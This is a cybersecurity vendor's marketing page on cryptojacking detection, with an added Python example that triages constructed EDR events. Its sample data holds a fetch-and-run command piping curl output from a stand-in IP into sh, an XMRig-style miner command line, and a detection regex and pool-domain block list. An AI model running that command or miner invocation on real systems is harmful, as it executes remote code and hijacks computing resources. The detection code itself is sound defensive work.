

Protect against cryptojacking

Expel-validated security alerts and guided investigative actions

Cryptojacking … the who, what, and why.

Cybercriminals: they’re always looking for new ways to make money. We often hear about holding data or systems for ransom. But what about cryptojacking? It’s when a threat actor hijacks your organization’s computing power and uses it to mine on various cryptocurrency blockchains. The bad news: it can slow your network way down, and even shut down critical processes.

The attack can be pretty straightforward: there’s no need to escalate privileges or move laterally to reach a host holding the secret they’re after. As our end-of-year report indicated, 35% of the web application compromise incidents we saw in 2021 resulted in deployment of various cryptocurrency coin miners. It’s a sweet gig for the bad guys, too: after the miner is deployed, they can sit back, relax, and watch the money pile up.

How do they get in? Public application exploitation. Access key compromise. Phishing emails. USB devices. These are just some of the ways. And the list grows every year.

What are your biggest cryptojacking prevention challenges?

I need to know if coin miners are installed.

I need visibility (ideally EDR) into host activity that could be coin miner entry points.

I need a “playbook” for coin miner investigating and fixing.

I need recommendations to proactively mitigate exploitations used for cryptojacking.

How Expel spots cryptojacking attacks

We set up alerts on process command-line arguments, unusual process lineages, and network connections to well-known cryptojacking pool domains or downloads of cryptojacking utilities, drawing on multiple detection sources such as EDR. We look for behavioral patterns. Then our bots, Josie™ and Ruxie™, get to work and automatically enrich and triage alerts, surfacing Expel-validated alerts. We notify you of the alerts that matter and automatically remediate the incident (unless you prefer to handle remediation yourself).
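To illustrate the three signals described above (miner-style command lines, unusual process lineage, and connections to known pool domains), here is an added example of the detection logic run over constructed EDR-style events. This is not Expel’s code: the events, host names, and the pool domain block list are all assumptions made up for the example, and a real deployment would load pool domains from threat intelligence.

```python
import re
from collections import defaultdict

# Constructed sample EDR events (not real telemetry): process starts with their
# parent lineage, plus outbound network connections, for two hosts.
EVENTS = [
    {"type": "process", "host": "web01", "parent": "httpd", "image": "sh",
     "cmdline": "sh -c 'curl -s http://198.51.100.7/x | sh'"},
    {"type": "process", "host": "web01", "parent": "sh", "image": "kthreadd",
     "cmdline": "./kthreadd -o stratum+tcp://pool.example.invalid:3333 --donate-level=1"},
    {"type": "network", "host": "web01", "image": "kthreadd",
     "dest": "pool.example.invalid", "port": 3333},
    {"type": "process", "host": "ws07", "parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe --profile-directory=Default"},
    {"type": "network", "host": "ws07", "image": "chrome.exe",
     "dest": "www.example.com", "port": 443},
]

# Command-line strings typical of XMRig-style miners: stratum pool URLs, donate level.
MINER_CMDLINE = re.compile(r"stratum\+(tcp|ssl)://|--donate-level", re.IGNORECASE)
# Placeholder block list (assumption); load real pool domains from threat intel.
POOL_DOMAINS = {"pool.example.invalid"}
# Web-server processes that should not normally spawn a shell (lineage anomaly).
WEB_PARENTS = {"httpd", "nginx", "php-fpm", "w3wp.exe", "tomcat"}
SHELLS = {"sh", "bash", "dash", "cmd.exe", "powershell.exe"}


def triage(events):
    """Apply the three detection rules; return {host: {rule_name: detail}}."""
    hits = defaultdict(dict)
    for e in events:
        if e["type"] == "process":
            if MINER_CMDLINE.search(e["cmdline"]):
                hits[e["host"]]["miner_cmdline"] = e["cmdline"]
            if e["parent"] in WEB_PARENTS and e["image"] in SHELLS:
                hits[e["host"]]["web_spawned_shell"] = f'{e["parent"]} -> {e["image"]}'
        elif e["type"] == "network" and e["dest"] in POOL_DOMAINS:
            hits[e["host"]]["pool_connection"] = f'{e["image"]} -> {e["dest"]}:{e["port"]}'
    return dict(hits)


def validated(hits, min_rules=2):
    """Hosts where independent rules corroborate each other, i.e. worth paging on."""
    return sorted(h for h, rules in hits.items() if len(rules) >= min_rules)


if __name__ == "__main__":
    h = triage(EVENTS)
    print(h)
    print("validated:", validated(h))
```

Requiring two independent rules before escalating is what keeps a single noisy signal (one odd command line, one unfamiliar domain) from paging anyone.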

Recently our SOC detected miners for the Monero blockchain, along with SolarMarker, Emotet, and AsyncRAT: the top malware families.

Results. Not more alerts to handle.

Reduce risk

We detect cryptojacking attacks fast so your business doesn’t slow down

Maximize ROI

We leverage existing detection sources in your environment to detect cryptojacking

Improve Security Posture

We recommend resilience measures to mitigate future attacks

Cryptojacking protection:
Identify and remediate compromised accounts and access, unusual behavior and more.

Fortunately, attacker entry points for cryptojacking overlap with those for other threat types like ransomware, so focused efforts to reduce your cryptojacking attack surface can help protect against multiple problems.

Related Resources


Detecting Coin Miners with Palo Alto Networks NGFW

With cryptojacking on the rise, we walk through why we’ve found Palo Alto Networks next-generation firewall is great at detecting it, and some actions we’ve integrated into our detection bot to help.


Expel Quarterly Threat Report - Q2 2022

This Q2 report delivers intelligence on some of the most active attack vectors our SOC leadership team observed.


Inside an Expel response

See why our median alert-to-fix timelines are shorter than the time it takes to deliver a pizza.


© 2022 Expel, Inc. All Rights Reserved
